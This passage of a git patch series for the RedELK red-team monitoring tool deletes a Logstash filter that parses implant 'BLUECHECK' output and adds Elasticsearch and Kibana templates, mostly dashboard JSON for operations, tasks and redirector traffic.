= string3.gsub(" Product",", \"Product\"") - string5 = string4.gsub(",{","},{") - string6 = string5.gsub(": ",": \"") - string7 = string6.gsub(", ","\", ") - string8 = string7.gsub("},","\"},") - string9 = "["+string8+"\" }]" - json = JSON.parse(string9) - event.tag("_rubyparseok") - event.set("[bluecheck][sectools]", json) - return [event] -end diff --git a/elkserver/mounts/logstash-config/redelk-main/conf.d/80-filter-bluecheck_domainchecks_logstash.conf b/elkserver/mounts/logstash-config/redelk-main/conf.d/80-filter-bluecheck_domainchecks_logstash.conf deleted file mode 100644 index 4294788f..00000000 --- a/elkserver/mounts/logstash-config/redelk-main/conf.d/80-filter-bluecheck_domainchecks_logstash.conf +++ /dev/null @@ -1,108 +0,0 @@ -# Part of RedELK -# -# In this file we parse the output of BLUECHECK tools -# -# Author: Outflank B.V. / Marc Smeets -# - -filter { - ## First we check if we have new fields that are bluecheck related and have the 'type' not set to bluecheck - # - if "BLUECHECK" in [implant][output] { - clone { - clones => [ "bluecheck" ] - remove_field => [ "[c2][log][type]","[infra][log][type]" ] - } - - # check if bluechecktype should be set to sslcert - if "SSL Certicate" in [implant][output] { - mutate { - add_field => { "bluechecktype" => "sslcert"} - } - - # check if bluechecktype should be set to pwchange - if "BLUECHECK Password" in [implant][output] { - mutate { - add_field => { "bluechecktype" => "pwchange"} - } - - # check if bluechecktype should be set to sectools - if "BLUECHECK Security Tools Check" in [implant][output] { - mutate { - add_field => { "bluechecktype" => "sectools"} - } - - - } - - ## Now parse fields with type == bluecheck - if [type] == "bluecheck" { - - # parse output of sslcert checks - if [bluechecktype] == "sslcert" { - grok { - match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK SSL Certificate\: (?<[bluecheck][message]>(.|\r|\n)*)\[\+\] Check Finished" } - } - grok { - match => { "[bluecheck][message]" => "%{URI:[bluecheck][uri]}%{GREEDYDATA} Subject Information:\\n%{GREEDYDATA:[bluecheck][certsubject]}\\n\[\+\] Issuer Information\:\\n%{GREEDYDATA:[bluecheck][certissuer]}\\n" } - } - } - - # parse output of PasswordChangeCheck - if [bluechecktype] == "pwchange" { - grok { - match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK Password\: (?<[bluecheck][message]>(.|\r|\n)*)\n" } - } - grok { - match => { "[bluecheck][message]" => "(?<[bluecheck][accountname]>(.|\r|\n)*) password last changed at\: (?<[bluecheck][pwchangedate]>%{MONTHNUM}\/%{MONTHDAY}\/%{YEAR} %{HOUR}\:%{MINUTE}\:%{SECOND}), account %{WORD:[bluecheck][accountstate]}." } - } - date { - match => [ "[bluecheck][pwchangedate]", "MM/dd/YYYY HH:mm:ss" ] - target => "@timestamp" - timezone => "Etc/UTC" - } - } - - # parse output of sectools checks - if [bluechecktype] == "sectools" { - grok { - match => { "[implant][output]" => "((.|\r|\n)*) BLUECHECK Security Tools check\:\n(?<[bluecheck][message]>(.|\r|\n)*)\[\+\] Check Finished" } - } - grok { - match => { "[bluecheck][message]" => "\[\+\] Security products found: %{INT:[bluecheck][sectoolsamount]}\\n%{GREEDYDATA:[bluecheck][sectools]}\\n\\n" } - } - # TODO cleanup the list of sectools - #mutate { - # gsub => ["[bluecheck][sectools]]", "\n Product:\t", " -"] - # } - - } - - - - - - # roguedomaincheck is different in the sense that data is read from config file elkserver/mounts/redelk-config/etc/redelk/redteamdomains.conf - # filebeat already sets the type field; there is no event from rtops duplicated. - # parse output of roguedomaincheck - if [bluechecktype] == "roguedomaincheck" { - grok { - match => { "message" => "(?%{YEAR}\/%{MONTHNUM}\/%{MONTHDAY}, %{HOUR}\:%{MINUTE}\:%{SECOND}) Domain\: %{IPORHOST:domain} Source\: %{GREEDYDATA:classifier} Results\: %{GREEDYDATA:results}" } - } - date { - match => [ "bluechecktimestamp", "YYYY/MM/dd, HH:mm:ss" ] - target => "@timestamp" - timezone => "Etc/UTC" - } - mutate { - remove_field => [ "host" ] - } - } - - if [pstools][psx][edr_name] { - mutate { - add_field => { "bluechecktype" => "psx"} - } - } - } -} \ No newline at end of file From 67c09b9681d3470a55bd472bd33ff3b3cad36be0 Mon Sep 17 00:00:00 2001 From: Marc Smeets Date: Sat, 19 Feb 2022 14:43:43 +0100 Subject: [PATCH 14/18] update of ES and Kibana templates --- .../diff/redelk_kibana_dashboard.json | 2225 +++++ ...lk_kibana_index-pattern_.siem-signals.json | 8685 +++++++++++++++++ ...redelk_kibana_index-pattern_bluecheck.json | 24 + ...delk_kibana_index-pattern_credentials.json | 886 ++ .../redelk_kibana_index-pattern_email.json | 2842 ++++++ ...edelk_kibana_index-pattern_implantsdb.json | 1895 ++++ .../redelk_kibana_index-pattern_iplist.json | 146 + .../redelk_kibana_index-pattern_redelk.json | 222 + ...elk_kibana_index-pattern_redirtraffic.json | 25 + .../redelk_kibana_index-pattern_rtops.json | 25 + .../diff/redelk_kibana_search.json | 1188 +++ .../diff/redelk_kibana_visualization.json | 5064 ++++++++++ .../redelk_elasticsearch_ilm.json | 1 + ...delk_elasticsearch_template_bluecheck.json | 154 + ...lk_elasticsearch_template_credentials.json | 354 + .../redelk_elasticsearch_template_email.json | 827 ++ ...elk_elasticsearch_template_implantsdb.json | 904 ++ .../redelk_elasticsearch_template_iplist.json | 61 + .../redelk_elasticsearch_template_redelk.json | 100 + ...k_elasticsearch_template_redirtraffic.json | 759 ++ .../redelk_elasticsearch_template_rtops.json | 864 ++ .../redelk_kibana_dashboard.ndjson | 12 + ..._kibana_index-pattern_.siem-signals.ndjson | 1 + ...delk_kibana_index-pattern_bluecheck.ndjson | 1 + ...lk_kibana_index-pattern_credentials.ndjson | 1 + .../redelk_kibana_index-pattern_email.ndjson | 1 + ...elk_kibana_index-pattern_implantsdb.ndjson | 1 + ..._kibana_index-pattern_redelk-iplist.ndjson | 1 + .../redelk_kibana_index-pattern_redelk.ndjson | 1 + ...k_kibana_index-pattern_redirtraffic.ndjson | 1 + .../redelk_kibana_index-pattern_rtops.ndjson | 1 + .../redelk_kibana_search.ndjson | 16 + .../redelk_kibana_settings.json | 13 + .../redelk_kibana_visualization.ndjson | 47 + .../redelk_siem_detection_rules.ndjson | 266 + 35 files changed, 27614 insertions(+) create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_dashboard.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_.siem-signals.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_bluecheck.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_credentials.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_email.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_implantsdb.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_iplist.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_redelk.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_redirtraffic.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_rtops.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_search.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_visualization.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_ilm.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_bluecheck.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_credentials.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_email.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_implantsdb.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_iplist.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_redelk.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_redirtraffic.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_rtops.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_dashboard.ndjson create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_.siem-signals.ndjson create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_bluecheck.ndjson create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_credentials.ndjson create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_email.ndjson create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_implantsdb.ndjson create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redelk-iplist.ndjson create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redelk.ndjson create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redirtraffic.ndjson create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_rtops.ndjson create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_search.ndjson create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_settings.json create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_visualization.ndjson create mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_siem_detection_rules.ndjson diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_dashboard.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_dashboard.json new file mode 100644 index 00000000..27348d65 --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_dashboard.json @@ -0,0 +1,2225 @@ +[ + { + "attributes": { + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 2, + "i": "93f74516-7d73-4db3-8d64-589dfd7492b7", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "93f74516-7d73-4db3-8d64-589dfd7492b7", + "panelRefName": "panel_93f74516-7d73-4db3-8d64-589dfd7492b7", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 2, + "i": "66e33663-63c3-4e78-aa5d-725e33754c02", + "w": 48, + "x": 0, + "y": 2 + }, + "panelIndex": "66e33663-63c3-4e78-aa5d-725e33754c02", + "panelRefName": "panel_66e33663-63c3-4e78-aa5d-725e33754c02", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 9, + "i": "800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3", + "w": 8, + "x": 0, + "y": 4 + }, + "panelIndex": "800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3", + "panelRefName": "panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 9, + "i": "86117a55-669e-4d4d-a4d6-436da4f1a930", + "w": 8, + "x": 8, + "y": 4 + }, + "panelIndex": "86117a55-669e-4d4d-a4d6-436da4f1a930", + "panelRefName": "panel_86117a55-669e-4d4d-a4d6-436da4f1a930", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 9, + "i": "ab07bed8-9d4e-409c-b3db-d15124eb5467", + "w": 8, + "x": 16, + "y": 4 + }, + "panelIndex": "ab07bed8-9d4e-409c-b3db-d15124eb5467", + "panelRefName": "panel_ab07bed8-9d4e-409c-b3db-d15124eb5467", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 9, + "i": "019655aa-c9de-444a-a4af-619b7297572b", + "w": 8, + "x": 24, + "y": 4 + }, + "panelIndex": "019655aa-c9de-444a-a4af-619b7297572b", + "panelRefName": "panel_019655aa-c9de-444a-a4af-619b7297572b", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 9, + "i": "43a0761e-49bc-4846-9956-04a604b063ec", + "w": 16, + "x": 32, + "y": 4 + }, + "panelIndex": "43a0761e-49bc-4846-9956-04a604b063ec", + "panelRefName": "panel_43a0761e-49bc-4846-9956-04a604b063ec", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 9, + "i": "eab2038d-128a-4b5b-8a72-701fd3f53bd8", + "w": 8, + "x": 0, + "y": 13 + }, + "panelIndex": "eab2038d-128a-4b5b-8a72-701fd3f53bd8", + "panelRefName": "panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 9, + "i": "e18544fe-ac30-43cf-891c-4448ffea6bbd", + "w": 8, + "x": 8, + "y": 13 + }, + "panelIndex": "e18544fe-ac30-43cf-891c-4448ffea6bbd", + "panelRefName": "panel_e18544fe-ac30-43cf-891c-4448ffea6bbd", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 9, + "i": "6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d", + "w": 16, + "x": 16, + "y": 13 + }, + "panelIndex": "6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d", + "panelRefName": "panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d", + "title": "Compromised realms", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 9, + "i": "223951c1-7fe0-40f9-9a89-0c91aedd7fce", + "w": 8, + "x": 32, + "y": 13 + }, + "panelIndex": "223951c1-7fe0-40f9-9a89-0c91aedd7fce", + "panelRefName": "panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 9, + "i": "c15dc2cd-fad3-44a3-b127-1cd47d837740", + "w": 8, + "x": 40, + "y": 13 + }, + "panelIndex": "c15dc2cd-fad3-44a3-b127-1cd47d837740", + "panelRefName": "panel_c15dc2cd-fad3-44a3-b127-1cd47d837740", + "type": "visualization", + "version": "7.8.0" + } + ], + "refreshInterval": { + "pause": true, + "value": 0 + }, + "timeFrom": "now-12M", + "timeRestore": true, + "timeTo": "now", + "title": "RedELK - Summary dashboard", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "02486040-d355-11ea-9301-a30a04251ae9", + "migrationVersion": { + "dashboard": "7.16.0" + }, + "references": [ + { + "id": "0f82b540-d237-11ea-9301-a30a04251ae9", + "name": "93f74516-7d73-4db3-8d64-589dfd7492b7:panel_93f74516-7d73-4db3-8d64-589dfd7492b7", + "type": "visualization" + }, + { + "id": "45491770-0886-11eb-a2d2-171dc8941414", + "name": "66e33663-63c3-4e78-aa5d-725e33754c02:panel_66e33663-63c3-4e78-aa5d-725e33754c02", + "type": "visualization" + }, + { + "id": "b19d4790-d35f-11ea-9301-a30a04251ae9", + "name": "800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3:panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3", + "type": "visualization" + }, + { + "id": "dcf86190-d319-11ea-9301-a30a04251ae9", + "name": "86117a55-669e-4d4d-a4d6-436da4f1a930:panel_86117a55-669e-4d4d-a4d6-436da4f1a930", + "type": "visualization" + }, + { + "id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", + "name": "ab07bed8-9d4e-409c-b3db-d15124eb5467:panel_ab07bed8-9d4e-409c-b3db-d15124eb5467", + "type": "visualization" + }, + { + "id": "389dddc0-d317-11ea-9301-a30a04251ae9", + "name": "019655aa-c9de-444a-a4af-619b7297572b:panel_019655aa-c9de-444a-a4af-619b7297572b", + "type": "visualization" + }, + { + "id": "ce581930-d361-11ea-9301-a30a04251ae9", + "name": "43a0761e-49bc-4846-9956-04a604b063ec:panel_43a0761e-49bc-4846-9956-04a604b063ec", + "type": "visualization" + }, + { + "id": "57626ad0-d355-11ea-9301-a30a04251ae9", + "name": "eab2038d-128a-4b5b-8a72-701fd3f53bd8:panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8", + "type": "visualization" + }, + { + "id": "464660c0-d360-11ea-9301-a30a04251ae9", + "name": "e18544fe-ac30-43cf-891c-4448ffea6bbd:panel_e18544fe-ac30-43cf-891c-4448ffea6bbd", + "type": "visualization" + }, + { + "id": "ff4497f0-d319-11ea-9301-a30a04251ae9", + "name": "6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d:panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d", + "type": "visualization" + }, + { + "id": "62b61920-d4e2-11ea-9301-a30a04251ae9", + "name": "223951c1-7fe0-40f9-9a89-0c91aedd7fce:panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce", + "type": "visualization" + }, + { + "id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", + "name": "c15dc2cd-fad3-44a3-b127-1cd47d837740:panel_c15dc2cd-fad3-44a3-b127-1cd47d837740", + "type": "visualization" + } + ], + "sort": [ + 1642171876916, + 34 + ], + "type": "dashboard", + "version": "1" + }, + { + "attributes": { + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 2, + "i": "9af964d0-b9c5-4fa0-81d7-6e7cf9657757", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "9af964d0-b9c5-4fa0-81d7-6e7cf9657757", + "panelRefName": "panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757", + "type": "visualization", + "version": "7.10.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 6, + "i": "09cb7bd6-8162-4141-8a0c-807ee57a4603", + "w": 24, + "x": 0, + "y": 2 + }, + "panelIndex": "09cb7bd6-8162-4141-8a0c-807ee57a4603", + "panelRefName": "panel_09cb7bd6-8162-4141-8a0c-807ee57a4603", + "title": "Target host(s) and user(s) filter", + "type": "visualization", + "version": "7.10.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 6, + "i": "fcd3a5bc-91d9-46a2-b08c-92958c5b6089", + "w": 12, + "x": 24, + "y": 2 + }, + "panelIndex": "fcd3a5bc-91d9-46a2-b08c-92958c5b6089", + "panelRefName": "panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089", + "title": "Implants per host", + "type": "visualization", + "version": "7.10.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 6, + "i": "47710d04-18f9-4563-bf0d-73b4dc24f9e5", + "w": 12, + "x": 36, + "y": 2 + }, + "panelIndex": "47710d04-18f9-4563-bf0d-73b4dc24f9e5", + "panelRefName": "panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5", + "title": "Implants per user", + "type": "visualization", + "version": "7.10.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 51, + "i": "30674424-d470-4b93-80c1-260d16f987ab", + "w": 48, + "x": 0, + "y": 8 + }, + "panelIndex": "30674424-d470-4b93-80c1-260d16f987ab", + "panelRefName": "panel_30674424-d470-4b93-80c1-260d16f987ab", + "type": "search", + "version": "7.10.0" + } + ], + "timeRestore": false, + "title": "RedELK - Red Team Operations", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "04b87c50-d028-11ea-9301-a30a04251ae9", + "migrationVersion": { + "dashboard": "7.16.0" + }, + "references": [ + { + "id": "0f82b540-d237-11ea-9301-a30a04251ae9", + "name": "9af964d0-b9c5-4fa0-81d7-6e7cf9657757:panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757", + "type": "visualization" + }, + { + "id": "d2c7b720-d026-11ea-9301-a30a04251ae9", + "name": "09cb7bd6-8162-4141-8a0c-807ee57a4603:panel_09cb7bd6-8162-4141-8a0c-807ee57a4603", + "type": "visualization" + }, + { + "id": "632081a0-d02a-11ea-9301-a30a04251ae9", + "name": "fcd3a5bc-91d9-46a2-b08c-92958c5b6089:panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089", + "type": "visualization" + }, + { + "id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", + "name": "47710d04-18f9-4563-bf0d-73b4dc24f9e5:panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5", + "type": "visualization" + }, + { + "id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", + "name": "30674424-d470-4b93-80c1-260d16f987ab:panel_30674424-d470-4b93-80c1-260d16f987ab", + "type": "search" + } + ], + "sort": [ + 1642171876916, + 40 + ], + "type": "dashboard", + "version": "1" + }, + { + "attributes": { + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 2, + "i": "8f1a6a90-4b7e-47ef-aa74-a6037b7461e1", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "8f1a6a90-4b7e-47ef-aa74-a6037b7461e1", + "panelRefName": "panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 9, + "i": "ecf77ead-e22f-4708-addf-0cbaaeb6fced", + "w": 24, + "x": 0, + "y": 2 + }, + "panelIndex": "ecf77ead-e22f-4708-addf-0cbaaeb6fced", + "panelRefName": "panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced", + "title": "Techniques, Tactics and Procedures", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 18, + "i": "ff3f84bc-6c84-43fd-aa0f-19e5a91be826", + "w": 24, + "x": 24, + "y": 2 + }, + "panelIndex": "ff3f84bc-6c84-43fd-aa0f-19e5a91be826", + "panelRefName": "panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826", + "title": "C2 tasks per host and user", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 9, + "i": "23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e", + "w": 24, + "x": 0, + "y": 11 + }, + "panelIndex": "23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e", + "panelRefName": "panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e", + "title": "Cobalt Strike tasks per operator", + "type": "visualization", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 14, + "i": "b038a84c-9db0-4266-af43-c8023da4781a", + "w": 48, + "x": 0, + "y": 20 + }, + "panelIndex": "b038a84c-9db0-4266-af43-c8023da4781a", + "panelRefName": "panel_b038a84c-9db0-4266-af43-c8023da4781a", + "title": "C2 tasks", + "type": "search", + "version": "7.8.0" + } + ], + "timeRestore": false, + "title": "RedELK - Tasks", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "0523c8a0-d025-11ea-9301-a30a04251ae9", + "migrationVersion": { + "dashboard": "7.16.0" + }, + "references": [ + { + "id": "0f82b540-d237-11ea-9301-a30a04251ae9", + "name": "8f1a6a90-4b7e-47ef-aa74-a6037b7461e1:panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1", + "type": "visualization" + }, + { + "id": "88db1280-d024-11ea-9301-a30a04251ae9", + "name": "ecf77ead-e22f-4708-addf-0cbaaeb6fced:panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced", + "type": "visualization" + }, + { + "id": "a5554e20-d025-11ea-9301-a30a04251ae9", + "name": "ff3f84bc-6c84-43fd-aa0f-19e5a91be826:panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826", + "type": "visualization" + }, + { + "id": "afb6ce00-d022-11ea-9301-a30a04251ae9", + "name": "23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e:panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e", + "type": "visualization" + }, + { + "id": "cc523820-d021-11ea-9301-a30a04251ae9", + "name": "b038a84c-9db0-4266-af43-c8023da4781a:panel_b038a84c-9db0-4266-af43-c8023da4781a", + "type": "search" + } + ], + "sort": [ + 1642171876916, + 46 + ], + "type": "dashboard", + "version": "1" + }, + { + "attributes": { + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "tags", + "negate": false, + "params": { + "query": "iplist_redteam" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "tags": "iplist_redteam" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "key": "tags", + "negate": false, + "params": { + "query": "iplist_customer" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "tags": "iplist_customer" + } + } + } + ], + "query": { + "language": "lucene", + "query": "" + } + } + }, + "optionsJSON": { + "darkTheme": false, + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 4, + "i": "948c1286-d4de-44a6-8fb2-95bf9252ed00", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "948c1286-d4de-44a6-8fb2-95bf9252ed00", + "panelRefName": "panel_948c1286-d4de-44a6-8fb2-95bf9252ed00", + "type": "visualization", + "version": "7.16.3" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 5, + "i": "ab9eb0fb-a164-4295-8177-865a2a67dccb", + "w": 36, + "x": 0, + "y": 4 + }, + "panelIndex": "ab9eb0fb-a164-4295-8177-865a2a67dccb", + "panelRefName": "panel_ab9eb0fb-a164-4295-8177-865a2a67dccb", + "title": "Filters", + "type": "visualization", + "version": "7.16.3" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "vis": { + "legendOpen": true + } + }, + "gridData": { + "h": 5, + "i": "c630a33e-6a98-466d-8223-fd83e6947b8c", + "w": 12, + "x": 36, + "y": 4 + }, + "panelIndex": "c630a33e-6a98-466d-8223-fd83e6947b8c", + "panelRefName": "panel_c630a33e-6a98-466d-8223-fd83e6947b8c", + "title": "HTTP Redir traffic per backend", + "type": "visualization", + "version": "7.16.3" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hiddenLayers": [], + "hidePanelTitles": false, + "isLayerTOCOpen": false, + "mapCenter": { + "lat": 14.5701, + "lon": 121.0254, + "zoom": 17 + }, + "openTOCDetails": [] + }, + "gridData": { + "h": 15, + "i": "1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", + "w": 24, + "x": 0, + "y": 9 + }, + "panelIndex": "1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", + "panelRefName": "panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", + "title": "HTTP redir traffic map", + "type": "map", + "version": "7.16.3" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "fc254327-57ac-4e5f-88f7-a32d48570289", + "w": 24, + "x": 24, + "y": 9 + }, + "panelIndex": "fc254327-57ac-4e5f-88f7-a32d48570289", + "panelRefName": "panel_fc254327-57ac-4e5f-88f7-a32d48570289", + "title": "HTTP Redir traffic over time", + "type": "visualization", + "version": "7.16.3" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "829f61cf-9374-4bb5-8214-34e6875e79da", + "w": 24, + "x": 0, + "y": 24 + }, + "panelIndex": "829f61cf-9374-4bb5-8214-34e6875e79da", + "panelRefName": "panel_829f61cf-9374-4bb5-8214-34e6875e79da", + "type": "visualization", + "version": "7.16.3" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 22, + "i": "0bc5f60b-f940-451a-886b-edff3512d180", + "w": 48, + "x": 0, + "y": 39 + }, + "panelIndex": "0bc5f60b-f940-451a-886b-edff3512d180", + "panelRefName": "panel_0bc5f60b-f940-451a-886b-edff3512d180", + "type": "search", + "version": "7.16.3" + } + ], + "refreshInterval": { + "pause": false, + "value": 30000 + }, + "timeFrom": "now-1d", + "timeRestore": true, + "timeTo": "now", + "title": "RedELK - Traffic dashboard", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba", + "migrationVersion": { + "dashboard": "7.16.0" + }, + "references": [ + { + "id": "redirtraffic", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "redirtraffic", + "name": 